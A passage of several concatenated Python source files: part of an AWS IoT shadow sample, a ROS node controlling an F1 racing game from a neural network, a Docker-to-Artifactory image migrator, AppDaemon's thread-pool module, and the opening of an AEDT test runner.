get_accepted_subscribed_future, _ = shadow_client.subscribe_to_get_shadow_accepted(
request=iotshadow.GetShadowSubscriptionRequest(thing_name=args.thing_name),
qos=mqtt.QoS.AT_LEAST_ONCE,
callback=on_get_shadow_accepted)
get_rejected_subscribed_future, _ = shadow_client.subscribe_to_get_shadow_rejected(
request=iotshadow.GetShadowSubscriptionRequest(thing_name=args.thing_name),
qos=mqtt.QoS.AT_LEAST_ONCE,
callback=on_get_shadow_rejected)
# Wait for subscriptions to succeed
get_accepted_subscribed_future.result()
get_rejected_subscribed_future.result()
print("Subscribing to Delta events...")
delta_subscribed_future, _ = shadow_client.subscribe_to_shadow_delta_updated_events(
request=iotshadow.ShadowDeltaUpdatedSubscriptionRequest(thing_name=args.thing_name),
qos=mqtt.QoS.AT_LEAST_ONCE,
callback=on_shadow_delta_updated)
# Wait for subscription to succeed
delta_subscribed_future.result()
# The rest of the sample runs asynchronously.
# Issue request for shadow's current state.
# The response will be received by the on_get_accepted() callback
print("Requesting current shadow state...")
with locked_data.lock:
# use a unique token so we can correlate this "request" message to
# any "response" messages received on the /accepted and /rejected topics
token = str(uuid4())
publish_get_future = shadow_client.publish_get_shadow(
request=iotshadow.GetShadowRequest(thing_name=args.thing_name, client_token=token),
qos=mqtt.QoS.AT_LEAST_ONCE)
locked_data.request_tokens.add(token)
# Ensure that publish succeeds
publish_get_future.result()
# Launch thread to handle user input.
# A "daemon" thread won't prevent the program from shutting down.
print("Launching thread to read user input...")
user_input_thread = threading.Thread(target=user_input_thread_fn, name='user_input_thread')
user_input_thread.daemon = True
user_input_thread.start()
except Exception as e:
exit(e)
# Wait for the sample to finish (user types 'quit', or an error occurs)
is_sample_done.wait()
|
admiralnet_e2e_ros.py | import argparse
import skimage
import skimage.io as io
import os
import time
from concurrent import futures
import logging
import argparse
import lmdb
import deepracing.backend
from numpy_ringbuffer import RingBuffer as RB
import yaml
import torch
import torchvision
import torchvision.transforms as tf
import deepracing.imutils
import scipy
import scipy.interpolate
import rpyutils
with rpyutils.add_dll_directories_from_env("PATH"):
import py_f1_interface
import deepracing.pose_utils
import deepracing
import threading
import numpy.linalg as la
import scipy.integrate as integrate
import socket
import scipy.spatial
import queue
import torch
import torch.nn as NN
import torch.utils.data as data_utils
import matplotlib.pyplot as plt
from sensor_msgs.msg import Image, CompressedImage
from deepracing_msgs.msg import PathRaw, ImageWithPath
from geometry_msgs.msg import Vector3Stamped, Vector3, PointStamped, Point, PoseStamped, Pose, Quaternion
from nav_msgs.msg import Path
from std_msgs.msg import Float64, Header
import rclpy
from rclpy import Parameter
from rclpy.node import Node
from rclpy.time import Time
from rclpy.clock import Clock, ROSClock
import deepracing_models.nn_models.Models as M
from scipy.spatial.transform import Rotation as Rot
import cv_bridge, cv2, numpy as np
from scipy.signal import butter, lfilter
from scipy.signal import freqs, bilinear
from numpy_ringbuffer import RingBuffer as RB
import time
class AdmiralNetE2EROS(Node):
def __init__(self):
super(AdmiralNetE2EROS,self).__init__('admiralnet_e2e_control', allow_undeclared_parameters=True, automatically_declare_parameters_from_overrides=True)
self.controller = py_f1_interface.F1Interface(1)
self.controller.setControl(0.0,0.0,0.0)
model_file_param = self.get_parameter("model_file")
if (model_file_param.type_==Parameter.Type.NOT_SET):
raise ValueError("The parameter \"model_file\" must be set for this rosnode")
model_file = model_file_param.get_parameter_value().string_value
print("Using model file : " + str(model_file))
config_file = os.path.join(os.path.dirname(model_file),"config.yaml")
with open(config_file,'r') as f:
config = yaml.load(f, Loader = yaml.SafeLoader)
input_channels = config["input_channels"]
context_length = config["context_length"]
sequence_length = config["sequence_length"]
output_dimension = config["output_dimension"]
hidden_dimension = config["hidden_dimension"]
gpu_param : Parameter = self.get_parameter_or("gpu",Parameter("gpu", value=0))
print("gpu_param: " + str(gpu_param))
use_compressed_images_param : Parameter = self.get_parameter_or("use_compressed_images",Parameter("use_compressed_images", value=False))
print("use_compressed_images_param: " + str(use_compressed_images_param))
self.gpu = gpu_param.get_parameter_value().integer_value
self.net : NN.Module = M.AdmiralNetKinematicPredictor(input_channels=input_channels, context_length=context_length, output_dimension=output_dimension, sequence_length=sequence_length, hidden_dim=hidden_dimension)
self.net.double()
self.get_logger().info('Loading model file: %s' % (model_file) )
self.net.load_state_dict(torch.load(model_file,map_location=torch.device("cpu")))
self.get_logger().info('Loaded model file: %s' % (model_file) )
self.get_logger().info('Moving model params to GPU')
self.net.cuda(self.gpu)
self.get_logger().info('Moved model params to GPU')
self.net.eval()
self.rosclock = ROSClock()
self.cvbridge : cv_bridge.CvBridge = cv_bridge.CvBridge()
capacity=10
self.steer_buffer = RB(capacity)
self.accel_buffer = RB(capacity)
cutoff_freq = 20.0 # 20 hz filter
b,a = butter(3,cutoff_freq,analog=True)
fs = 90.888099
self.dt = 1/fs
z, p = bilinear(b,a,fs=fs)
self.z = z
self.p = p
if use_compressed_images_param.get_parameter_value().bool_value:
self.image_sub = self.create_subscription( CompressedImage, '/f1_screencaps/cropped/compressed', self.compressedImageCallback, 1)
else:
self.image_sub = self.create_subscription( Image, '/f1_screencaps/cropped', self.imageCallback, 1)
self.control_thread = threading.Thread(target=self.controlLoop)
self.flow_buffer = RB(self.net.context_length,dtype=(np.float64,(2,66,200)))
self.image_buffer = RB(self.net.context_length,dtype=(np.float64,(3,66,200)))
self.running=False
self.prev_image = None
def start(self):
self.running=True
self.control_thread.start()
def stop(self):
self.running=False
def controlLoop(self):
while self.running:
t1 = time.time()
imnp = np.array(self.image_buffer).astype(np.float64).copy()
imtorch = torch.from_numpy(imnp.copy())
flownp = np.array(self.flow_buffer).astype(np.float64).copy()
flowtorch = torch.from_numpy(flownp.copy())
#print(imtorch.shape)
if not ( imtorch.shape[0] == self.net.context_length and flowtorch.shape[0] == self.net.context_length ):
continue
controlout = self.net(torch.cat((imtorch, flowtorch), dim=1).unsqueeze(0).cuda(self.gpu))
steering = controlout[0,0,0].item()
differential = controlout[0,0,1].item()
self.steer_buffer.append(steering)
self.accel_buffer.append(differential)
if not (self.steer_buffer.is_full and self.accel_buffer.is_full):
continue
steering_filtered = lfilter(self.z,self.p,np.array(self.steer_buffer))
accel_filtered = np.array(self.accel_buffer)
#accel_filtered = lfilter(self.z,self.p,np.array(self.accel_buffer))
steering = 1.5*steering_filtered[-1]
differential = 10.0*accel_filtered[-1]
if differential>0:
self.controller.setControl(-steering, differential, 0.0)
else:
self.controller.setControl(-steering, 0.0, -differential)
t2 = time.time()
dt = t2-t1
# print("dt: %f. fs: %f", (dt,1/dt))
def compressedImageCallback(self, img_msg : CompressedImage):
# print("Got a compressed image")
try:
imnp = self.cvbridge.compressed_imgmsg_to_cv2(img_msg, desired_encoding="rgb8")
except Exception as e:
print(e)
return
# print(imnp.shape)
if imnp.shape[0]<=0 or imnp.shape[0]<=0:
return
imnpdouble = tf.functional.to_tensor(deepracing.imutils.resizeImage( imnp, (66,200) ) ).double().numpy().copy()
if self.prev_image is None:
self.prev_image = cv2.cvtColor( (255*imnpdouble).astype(np.uint8).transpose(1,2,0) , cv2.COLOR_RGB2GRAY )
return
img_curr = cv2.cvtColor( (255*imnpdouble).astype(np.uint8).transpose(1,2,0) , cv2.COLOR_RGB2GRAY )
flow = cv2.calcOpticalFlowFarneback(self.prev_image, img_curr, None, 0.5, 3, 15, 3, 5, 1.2, 0).astype(np.float64)
self.flow_buffer.append(flow.transpose(2,0,1))
self.image_buffer.append(imnpdouble)
self.prev_image = img_curr
def imageCallback(self, img_msg : Image):
print("Got an image")
if img_msg.height<=0 or img_msg.width<=0:
return
try:
imnp = self.cvbridge.compressed_imgmsg_to_cv2(img_msg, desired_encoding="rgb8")
except:
print(e)
return
imnpdouble = tf.functional.to_tensor(deepracing.imutils.resizeImage( imnp, (66,200) ) ).double().numpy().copy()
self.image_buffer.append(imnpdouble)
|
Migrator.py | import logging
import copy
from threading import Thread
from Queue import Queue
class Migrator(object):
def __init__(self, source_registry, artifactory_access, work_queue, workers, overwrite, dir_path):
self.log = logging.getLogger(__name__)
self.source = source_registry
self.target = artifactory_access
self.work_queue = work_queue
self.failure_queue = Queue()
self.skipped_queue = Queue()
self.overwrite = overwrite
self.workers = workers
self.dir_path = dir_path
'''
Iterates over the Queue until all images have been uploaded (or have failed to upload)
'''
def migrate(self):
for i in range(self.workers):
t = Thread(target=self.__worker, args=(i,))
t.daemon = True
t.start()
self.work_queue.join()
'''
Consumes image/tags that need to be uploaded from Queue until Queue is empty
Builds shared list of failed entries
@param idx - The index (or ID) of this worker. Should be unique across all concurrent workers.
'''
def __worker(self, idx):
# The endpoint resources are not thread safe, make deep copies
source = copy.deepcopy(self.source)
target = copy.deepcopy(self.target)
while True:
image, tag = self.work_queue.get()
failure = True
try:
if self.overwrite or not target.image_exists(image, tag):
failure = not self.__upload_image(source, target, image, tag, idx)
else: # Image already exists and we should not overwrite it
failure = False
self.skipped_queue.put((image, tag))
except Exception as ex:
self.log.error("Upload of %s/%s failed." % (image, tag))
if failure:
self.failure_queue.put((image, tag))
self.work_queue.task_done()
'''
Attempts to upload the specified image from the source to the target
@source - The source registry
@target - The target Artifactory instance
@image - The image name
@tag - The tag name
'''
def __upload_image(self, source, target, image, tag, idx):
self.log.info("Uploading image %s/%s..." % (image, tag))
layer_file = "%s/layer%d.out" % (self.dir_path, idx)
manifest_file = "%s/manifest%d.json" % (self.dir_path, idx)
# Get the manifest
if source.download_manifest(image, tag, manifest_file):
# Read in all the layers and try to deploy them
type, layers = source.interpret_manifest(manifest_file)
for layer in layers:
sha2 = layer.replace('sha256:', '')
# Try to perform a sha2 checksum deploy to avoid downloading the layer from source
if not target.checksum_deploy_sha2(image, tag, sha2):
# Sha2 checksum failed, download the file
sha1 = source.download_layer(image, layer, layer_file)
if sha1:
# Try a sha1 checksum deploy to avoid upload to target
if not target.checksum_deploy_sha1(image, tag, sha2, sha1):
# All checksum deploys failed, perform an actual upload
if not target.upload_layer(image, tag, sha2, layer_file):
self.log.error("Unable to upload layer %s for %s/%s" % (layer, image, tag))
return False
else:
self.log.error("Unable to get layer %s for %s/%s..." % (layer, image, tag))
return False
# Finished uploading all layers, upload the manifest
if not target.upload_manifest(image, tag, type, manifest_file):
self.log.error("Unable to deploy manifest for %s/%s..." % (image, tag))
return False
return True
else:
self.log.error("Unable to get manifest for %s/%s..." % (image, tag))
return False
def get_failure_queue(self):
return self.failure_queue
def get_skipped_queue(self):
return self.skipped_queue
|
threading.py | import threading
import datetime
from queue import Queue
from random import randint
import re
import sys
import traceback
import inspect
from datetime import timedelta
import logging
from appdaemon import utils as utils
from appdaemon.appdaemon import AppDaemon
class Threading:
def __init__(self, ad: AppDaemon, kwargs):
self.AD = ad
self.kwargs = kwargs
self.logger = ad.logging.get_child("_threading")
self.diag = ad.logging.get_diag()
self.thread_count = 0
self.threads = {}
# A few shortcuts
self.add_entity = ad.state.add_entity
self.get_state = ad.state.get_state
self.set_state = ad.state.set_state
self.add_to_state = ad.state.add_to_state
self.add_to_attr = ad.state.add_to_attr
self.auto_pin = True
self.pin_threads = 0
self.total_threads = 0
# Setup stats
self.current_callbacks_executed = 0
self.current_callbacks_fired = 0
self.last_stats_time = datetime.datetime(1970, 1, 1, 0, 0, 0, 0)
self.callback_list = []
async def get_callback_update(self):
now = datetime.datetime.now()
self.callback_list.append(
{
"fired": self.current_callbacks_fired,
"executed": self.current_callbacks_executed,
"ts": now
})
if len(self.callback_list) > 10:
self.callback_list.pop(0)
fired_sum = 0
executed_sum = 0
for item in self.callback_list:
fired_sum += item["fired"]
executed_sum += item["executed"]
total_duration = (self.callback_list[len(self.callback_list) -1]["ts"] - self.callback_list[0]["ts"]).total_seconds()
if total_duration == 0:
fired_avg = 0
executed_avg = 0
else:
fired_avg = round(fired_sum / total_duration, 1)
executed_avg = round(executed_sum / total_duration, 1)
await self.set_state("_threading", "admin", "sensor.callbacks_average_fired", state=fired_avg)
await self.set_state("_threading", "admin", "sensor.callbacks_average_executed", state=executed_avg)
self.last_stats_time = now
self.current_callbacks_executed = 0
self.current_callbacks_fired = 0
async def init_admin_stats(self):
# Initialize admin stats
await self.add_entity("admin", "sensor.callbacks_total_fired", 0)
await self.add_entity("admin", "sensor.callbacks_average_fired", 0)
await self.add_entity("admin", "sensor.callbacks_total_executed", 0)
await self.add_entity("admin", "sensor.callbacks_average_executed", 0)
await self.add_entity("admin", "sensor.threads_current_busy", 0)
await self.add_entity("admin", "sensor.threads_max_busy", 0)
await self.add_entity("admin", "sensor.threads_max_busy_time", utils.dt_to_str(datetime.datetime(1970, 1, 1, 0, 0, 0, 0)))
await self.add_entity("admin", "sensor.threads_last_action_time", utils.dt_to_str(datetime.datetime(1970, 1, 1, 0, 0, 0, 0)))
async def create_initial_threads(self):
kwargs = self.kwargs
if "threads" in kwargs:
self.logger.warning(
"Threads directive is deprecated apps - will be pinned. Use total_threads if you want to unpin your apps")
if "total_threads" in kwargs:
self.total_threads = kwargs["total_threads"]
self.auto_pin = False
else:
apps = await self.AD.app_management.check_config(True, False)
self.total_threads = int(apps["active"])
self.pin_apps = True
utils.process_arg(self, "pin_apps", kwargs)
if self.pin_apps is True:
self.pin_threads = self.total_threads
else:
self.auto_pin = False
self.pin_threads = 0
if "total_threads" not in kwargs:
self.total_threads = 10
utils.process_arg(self, "pin_threads", kwargs, int=True)
if self.pin_threads > self.total_threads:
raise ValueError("pin_threads cannot be > total_threads")
if self.pin_threads < 0:
raise ValueError("pin_threads cannot be < 0")
self.logger.info("Starting Apps with %s workers and %s pins", self.total_threads, self.pin_threads)
self.next_thread = self.pin_threads
self.thread_count = 0
for i in range(self.total_threads):
await self.add_thread(True)
def get_q(self, thread_id):
return self.threads[thread_id]["queue"]
@staticmethod
def atoi(text):
return int(text) if text.isdigit() else text
def natural_keys(self, text):
return [self.atoi(c) for c in re.split('(\d+)', text)]
# Diagnostics
def total_q_size(self):
qsize = 0
for thread in self.threads:
qsize += self.threads[thread]["queue"].qsize()
return qsize
def min_q_id(self):
id = 0
i = 0
qsize = sys.maxsize
for thread in self.threads:
if self.threads[thread]["queue"].qsize() < qsize:
qsize = self.threads[thread]["queue"].qsize()
id = i
i += 1
return id
async def dump_threads(self):
self.diag.info("--------------------------------------------------")
self.diag.info("Threads")
self.diag.info("--------------------------------------------------")
current_busy = await self.get_state("_threading", "admin", "sensor.threads_current_busy")
max_busy = await self.get_state("_threading", "admin", "sensor.threads_max_busy")
max_busy_time = utils.str_to_dt(await self.get_state("_threading", "admin", "sensor.threads_max_busy_time"))
last_action_time = await self.get_state("_threading", "admin", "sensor.threads_last_action_time")
self.diag.info("Currently busy threads: %s", current_busy)
self.diag.info("Most used threads: %s at %s", max_busy, max_busy_time)
self.diag.info("Last activity: %s", last_action_time)
self.diag.info("Total Q Entries: %s", self.total_q_size())
self.diag.info("--------------------------------------------------")
for thread in sorted(self.threads, key=self.natural_keys):
t = await self.get_state("_threading", "admin", "thread.{}".format(thread), attribute="all")
print("thread.{}".format(thread), t)
self.diag.info(
"%s - qsize: %s | current callback: %s | since %s, | alive: %s, | pinned apps: %s",
thread,
t["attributes"]["q"],
t["state"],
t["attributes"]["time_called"],
t["attributes"]["is_alive"],
await self.get_pinned_apps(thread)
)
self.diag.info("--------------------------------------------------")
#
# Thread Management
#
def select_q(self, args):
#
# Select Q based on distribution method:
# Round Robin
# Random
# Load distribution
#
# Check for pinned app and if so figure correct thread for app
if args["pin_app"] is True:
thread = args["pin_thread"]
# Handle the case where an App is unpinned but selects a pinned callback without specifying a thread
# If this happens a lot, thread 0 might get congested but the alternatives are worse!
if thread == -1:
self.logger.warning("Invalid thread ID for pinned thread in app: %s - assigning to thread 0", args["name"])
thread = 0
else:
if self.thread_count == self.pin_threads:
raise ValueError("pin_threads must be set lower than threads if unpinned_apps are in use")
if self.AD.load_distribution == "load":
thread = self.min_q_id()
elif self.AD.load_distribution == "random":
thread = randint(self.pin_threads, self.thread_count - 1)
else:
# Round Robin is the catch all
thread = self.next_thread
self.next_thread += 1
if self.next_thread == self.thread_count:
self.next_thread = self.pin_threads
if thread < 0 or thread >= self.thread_count:
raise ValueError("invalid thread id: {} in app {}".format(thread, args["name"]))
id = "thread-{}".format(thread)
q = self.threads[id]["queue"]
q.put_nowait(args)
async def check_overdue_and_dead_threads(self):
if self.AD.sched.realtime is True and self.AD.thread_duration_warning_threshold != 0:
for thread_id in self.threads:
if self.threads[thread_id]["thread"].isAlive() is not True:
self.logger.critical("Thread %s has died", thread_id)
self.logger.critical("Pinned apps were: %s", await self.get_pinned_apps(thread_id))
self.logger.critical("Thread will be restarted")
id=thread_id.split("-")[1]
await self.add_thread(silent=False, pinthread=False, id=id)
if await self.get_state("_threading", "admin", "thread.{}".format(thread_id)) != "idle":
start = utils.str_to_dt(await self.get_state("_threading", "admin", "thread.{}".format(thread_id), attribute="time_called"))
dur = (await self.AD.sched.get_now() - start).total_seconds()
if dur >= self.AD.thread_duration_warning_threshold and dur % self.AD.thread_duration_warning_threshold == 0:
self.logger.warning("Excessive time spent in callback: %s - %s",
await self.get_state("_threading", "admin", "thread.{}".format(thread_id),
attribute="callback")
, dur)
async def check_q_size(self, warning_step, warning_iterations):
if self.total_q_size() > self.AD.qsize_warning_threshold:
if (warning_step == 0 and warning_iterations >= self.AD.qsize_warning_iterations) or warning_iterations == self.AD.qsize_warning_iterations:
self.logger.warning("Queue size is %s, suspect thread starvation", self.total_q_size())
await self.dump_threads()
warning_step = 0
warning_step += 1
warning_iterations += 1
if warning_step >= self.AD.qsize_warning_step:
warning_step = 0
else:
warning_step = 0
warning_iterations = 0
return warning_step, warning_iterations
async def update_thread_info(self, thread_id, callback, app, type, uuid):
self.logger.debug("Update thread info: %s", thread_id)
if self.AD.log_thread_actions:
if callback == "idle":
self.diag.info(
"%s done", thread_id)
else:
self.diag.info(
"%s calling %s callback %s", thread_id, type, callback)
now = await self.AD.sched.get_now()
if callback == "idle":
start = utils.str_to_dt(await self.get_state("_threading", "admin", "thread.{}".format(thread_id), attribute="time_called"))
if self.AD.sched.realtime is True and (now - start).total_seconds() >= self.AD.thread_duration_warning_threshold:
self.logger.warning("callback %s has now completed", await self.get_state("_threading", "admin", "thread.{}".format(thread_id)))
await self.add_to_state("_threading", "admin", "sensor.threads_current_busy", -1)
await self.add_to_attr("_threading", "admin", "app.{}".format(app), "callbacks", 1)
await self.add_to_attr("_threading", "admin", "{}_callback.{}".format(type, uuid), "executed", 1)
await self.add_to_state("_threading", "admin", "sensor.callbacks_total_executed", 1)
self.current_callbacks_executed += 1
else:
await self.add_to_state("_threading", "admin", "sensor.threads_current_busy", 1)
self.current_callbacks_fired += 1
current_busy = await self.get_state("_threading", "admin", "sensor.threads_current_busy")
max_busy = await self.get_state("_threading", "admin", "sensor.threads_max_busy")
if current_busy > max_busy:
await self.set_state("_threading", "admin", "sensor.threads_max_busy" , state=current_busy)
await self.set_state("_threading", "admin", "sensor.threads_max_busy_time", state=utils.dt_to_str((await self.AD.sched.get_now()).replace(microsecond=0), self.AD.tz))
await self.set_state("_threading", "admin", "sensor.threads_last_action_time", state=utils.dt_to_str((await self.AD.sched.get_now()).replace(microsecond=0), self.AD.tz))
# Update thread info
await self.set_state("_threading", "admin", "thread.{}".format(thread_id),
q=self.threads[thread_id]["queue"].qsize(),
state=callback,
time_called=utils.dt_to_str(now.replace(microsecond=0), self.AD.tz),
is_alive = self.threads[thread_id]["thread"].is_alive(),
pinned_apps=await self.get_pinned_apps(thread_id)
)
await self.set_state("_threading", "admin", "app.{}".format(app), state=callback)
#
# Pinning
#
async def add_thread(self, silent=False, pinthread=False, id=None):
if id is None:
tid = self.thread_count
else:
tid = id
if silent is False:
self.logger.info("Adding thread %s", tid)
t = threading.Thread(target=self.worker)
t.daemon = True
name = "thread-{}".format(tid)
t.setName(name)
if id is None:
await self.add_entity("admin", "thread.{}".format(name), "idle",
{
"q": 0,
"is_alive": True,
"time_called": utils.dt_to_str(datetime.datetime(1970, 1, 1, 0, 0, 0, 0)),
}
)
self.threads[name] = {}
self.threads[name]["queue"] = Queue(maxsize=0)
t.start()
self.thread_count += 1
if pinthread is True:
self.pin_threads += 1
else:
await self.set_state("_threading", "admin", "thread.{}".format(name), state="idle", is_alive=True)
self.threads[name]["thread"] = t
async def calculate_pin_threads(self):
if self.pin_threads == 0:
return
thread_pins = [0] * self.pin_threads
for name in self.AD.app_management.objects:
# Looking for apps that already have a thread pin value
if await self.get_app_pin(name) and await self.get_pin_thread(name) != -1:
thread = await self.get_pin_thread(name)
if thread >= self.thread_count:
raise ValueError("Pinned thread out of range - check apps.yaml for 'pin_thread' or app code for 'set_pin_thread()'")
# Ignore anything outside the pin range as it will have been set by the user
if thread < self.pin_threads:
thread_pins[thread] += 1
# Now we know the numbers, go fill in the gaps
for name in self.AD.app_management.objects:
if await self.get_app_pin(name) and await self.get_pin_thread(name) == -1:
thread = thread_pins.index(min(thread_pins))
await self.set_pin_thread(name, thread)
thread_pins[thread] += 1
for thread in self.threads:
pinned_apps = await self.get_pinned_apps(thread)
await self.set_state("_threading", "admin", "thread.{}".format(thread), pinned_apps=pinned_apps)
def app_should_be_pinned(self, name):
# Check apps.yaml first - allow override
app = self.AD.app_management.app_config[name]
if "pin_app" in app:
return app["pin_app"]
# if not, go with the global default
return self.pin_apps
async def get_app_pin(self, name):
return self.AD.app_management.objects[name]["pin_app"]
async def set_app_pin(self, name, pin):
self.AD.app_management.objects[name]["pin_app"] = pin
if pin is True:
# May need to set this app up with a pinned thread
await self.calculate_pin_threads()
async def get_pin_thread(self, name):
return self.AD.app_management.objects[name]["pin_thread"]
async def set_pin_thread(self, name, thread):
self.AD.app_management.objects[name]["pin_thread"] = thread
def validate_pin(self, name, kwargs):
if "pin_thread" in kwargs:
if kwargs["pin_thread"] < 0 or kwargs["pin_thread"] >= self.thread_count:
self.logger.warning("Invalid value for pin_thread (%s) in app: %s - discarding callback", kwargs["pin_thread"], name)
return False
else:
return True
async def get_pinned_apps(self, thread):
id = int(thread.split("-")[1])
apps = []
for obj in self.AD.app_management.objects:
if self.AD.app_management.objects[obj]["pin_thread"] == id:
apps.append(obj)
return apps
#
# Constraints
#
async def check_constraint(self, key, value, app):
unconstrained = True
if key in app.list_constraints():
method = getattr(app, key)
unconstrained = await utils.run_in_executor(self, method, value)
return unconstrained
async def check_time_constraint(self, args, name):
unconstrained = True
if "constrain_start_time" in args or "constrain_end_time" in args:
if "constrain_start_time" not in args:
start_time = "00:00:00"
else:
start_time = args["constrain_start_time"]
if "constrain_end_time" not in args:
end_time = "23:59:59"
else:
end_time = args["constrain_end_time"]
if await self.AD.sched.now_is_between(start_time, end_time, name) is False:
unconstrained = False
return unconstrained
#
# Workers
#
async def check_and_dispatch_state(self, name, funcref, entity, attribute, new_state,
old_state, cold, cnew, kwargs, uuid_, pin_app, pin_thread):
executed = False
#kwargs["handle"] = uuid_
if attribute == "all":
executed = await self.dispatch_worker(name, {
"id": uuid_,
"name": name,
"objectid": self.AD.app_management.objects[name]["id"],
"type": "state",
"function": funcref,
"attribute": attribute,
"entity": entity,
"new_state": new_state,
"old_state": old_state,
"pin_app": pin_app,
"pin_thread": pin_thread,
"kwargs": kwargs,
})
else:
if old_state is None:
old = None
else:
if attribute in old_state:
old = old_state[attribute]
elif 'attributes' in old_state and attribute in old_state['attributes']:
old = old_state['attributes'][attribute]
else:
old = None
if new_state is None:
new = None
else:
if attribute in new_state:
new = new_state[attribute]
elif 'attributes' in new_state and attribute in new_state['attributes']:
new = new_state['attributes'][attribute]
else:
new = None
if (cold is None or cold == old) and (cnew is None or cnew == new) and new != old:
if "duration" in kwargs:
# Set a timer
exec_time = await self.AD.sched.get_now() + timedelta(seconds=int(kwargs["duration"]))
kwargs["__duration"] = await self.AD.sched.insert_schedule(
name, exec_time, funcref, False, None,
__entity=entity,
__attribute=attribute,
__old_state=old,
__new_state=new, **kwargs
)
else:
# Do it now
executed = await self.dispatch_worker(name, {
"id": uuid_,
"name": name,
"objectid": self.AD.app_management.objects[name]["id"],
"type": "state",
"function": funcref,
"attribute": attribute,
"entity": entity,
"new_state": new,
"old_state": old,
"pin_app": pin_app,
"pin_thread": pin_thread,
"kwargs": kwargs
})
else:
if "__duration" in kwargs and new != old:
# cancel timer
await self.AD.sched.cancel_timer(name, kwargs["__duration"])
return executed
async def dispatch_worker(self, name, args):
unconstrained = True
#
# Argument Constraints
#
for arg in self.AD.app_management.app_config[name].keys():
constrained = await self.check_constraint(arg, self.AD.app_management.app_config[name][arg], self.AD.app_management.objects[name]["object"])
if not constrained:
unconstrained = False
if not await self.check_time_constraint(self.AD.app_management.app_config[name], name):
unconstrained = False
#
# Callback level constraints
#
myargs = utils.deepcopy(args)
if "kwargs" in myargs:
for arg in myargs["kwargs"].keys():
constrained = await self.check_constraint(arg, myargs["kwargs"][arg], self.AD.app_management.objects[name]["object"])
if not constrained:
unconstrained = False
if not await self.check_time_constraint(myargs["kwargs"], name):
unconstrained = False
if unconstrained:
#
# It's going to happen
#
await self.add_to_state("_threading", "admin", "sensor.callbacks_total_fired", 1)
await self.add_to_attr("_threading", "admin", "{}_callback.{}".format(myargs["type"], myargs["id"]), "fired", 1)
#
# And Q
#
self.select_q(myargs)
return True
else:
return False
# noinspection PyBroadException
def worker(self):
thread_id = threading.current_thread().name
q = self.get_q(thread_id)
while True:
args = q.get()
_type = args["type"]
funcref = args["function"]
_id = args["id"]
objectid = args["objectid"]
name = args["name"]
error_logger = logging.getLogger("Error.{}".format(name))
args["kwargs"]["__thread_id"] = thread_id
callback = "{}() in {}".format(funcref.__name__, name)
app = utils.run_coroutine_threadsafe(self, self.AD.app_management.get_app_instance(name, objectid))
if app is not None:
try:
if _type == "scheduler":
if self.validate_callback_sig(name, "scheduler", funcref):
utils.run_coroutine_threadsafe(self, self.update_thread_info(thread_id, callback, name, _type, _id))
funcref(self.AD.sched.sanitize_timer_kwargs(app, args["kwargs"]))
elif _type == "state":
if self.validate_callback_sig(name, "state", funcref):
entity = args["entity"]
attr = args["attribute"]
old_state = args["old_state"]
new_state = args["new_state"]
utils.run_coroutine_threadsafe(self, self.update_thread_info(thread_id, callback, name, _type, _id))
funcref(entity, attr, old_state, new_state,
self.AD.state.sanitize_state_kwargs(app, args["kwargs"]))
elif _type == "event":
data = args["data"]
if args["event"] == "__AD_LOG_EVENT":
if self.validate_callback_sig(name, "log_event", funcref):
utils.run_coroutine_threadsafe(self, self.update_thread_info(thread_id, callback, name, _type, _id))
funcref(data["app_name"], data["ts"], data["level"], data["type"], data["message"], args["kwargs"])
else:
if self.validate_callback_sig(name, "event", funcref):
utils.run_coroutine_threadsafe(self, self.update_thread_info(thread_id, callback, name, _type, _id))
funcref(args["event"], data, args["kwargs"])
except:
error_logger.warning('-' * 60,)
error_logger.warning("Unexpected error in worker for App %s:", name)
error_logger.warning( "Worker Ags: %s", args)
error_logger.warning('-' * 60)
error_logger.warning(traceback.format_exc())
error_logger.warning('-' * 60)
if self.AD.logging.separate_error_log() is True:
self.logger.warning("Logged an error to %s", self.AD.logging.get_filename("error_log"))
finally:
utils.run_coroutine_threadsafe(self, self.update_thread_info(thread_id, "idle", name, _type, _id))
else:
if not self.AD.stopping:
self.logger.warning("Found stale callback for %s - discarding", name)
q.task_done()
def validate_callback_sig(self, name, type, funcref):
callback_args = {
"scheduler": {"count": 1, "signature": "f(self, kwargs)"},
"state": {"count": 5, "signature": "f(self, entity, attribute, old, new, kwargs)"},
"event": {"count": 3, "signature": "f(self, event, data, kwargs)"},
"log_event": {"count": 6, "signature": "f(self, name, ts, level, type, message, kwargs)"},
"initialize": {"count": 0, "signature": "initialize()"}
}
sig = inspect.signature(funcref)
if type in callback_args:
if len(sig.parameters) != callback_args[type]["count"]:
self.logger.warning("Incorrect signature type for callback %s(), should be %s - discarding", funcref.__name__, callback_args[type]["signature"])
return False
else:
return True
else:
self.logger.error("Unknown callback type: %s", type)
return False
|
aedt_test_runner.py | import argparse
import datetime
import json
import os
import platform
import re
import subprocess
import tempfile
import threading
from contextlib import contextmanager
from distutils.dir_util import copy_tree
from distutils.dir_util import mkpath
from distutils.dir_util import remove_tree
from distutils.file_util import copy_file
from pathlib import Path
from time import sleep
from typing import Any
from typing import Dict
from typing import Iterable
from typing import Iterator
from typing import List
from typing import Optional
from typing import Tuple
from typing import Union
import tomli
from django import setup as django_setup
from django.conf import settings as django_settings
from django.template.loader import get_template
from aedttest.clusters.job_hosts import get_job_machines
from aedttest.logger import logger
from aedttest.logger import set_logger
from pyaedt import __file__ as _py_aedt_path # isort: skip
MODULE_DIR = Path(__file__).resolve().parent
CWD_DIR = Path.cwd()
LOGFOLDER_PATH = CWD_DIR / "logs"
LOGFILE_PATH = LOGFOLDER_PATH / "aedt_test_framework.log"
# configure Django templates
django_settings.configure(
TEMPLATES=[
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"DIRS": [MODULE_DIR / "static" / "templates"], # if you want the templates from a file
},
]
)
django_setup()
MAIN_PAGE_TEMPLATE = get_template("main.html")
PROJECT_PAGE_TEMPLATE = get_template("project-report.html")
def main() -> None:
"""Main function that is executed by ``flit`` CLI script and by executing this python file."""
try:
cli_args = parse_arguments()
except ValueError as exc:
logger.error(str(exc))
raise SystemExit(1)
try:
aedt_tester = ElectronicsDesktopTester(
version=cli_args.aedt_version,
max_cores=cli_args.max_cores,
max_parallel_projects=cli_args.max_projects,
config_folder=cli_args.config_folder,
out_dir=cli_args.out_dir,
save_projects=cli_args.save_sim_data,
only_reference=cli_args.only_reference,
reference_folder=cli_args.reference_folder,
)
if not cli_args.suppress_validation:
aedt_tester.validate_config()
if cli_args.only_validate:
return
aedt_tester.run()
except Exception as exc:
logger.exception(str(exc))
raise
class ElectronicsDesktopTester:
def __init__(
self,
version: str,
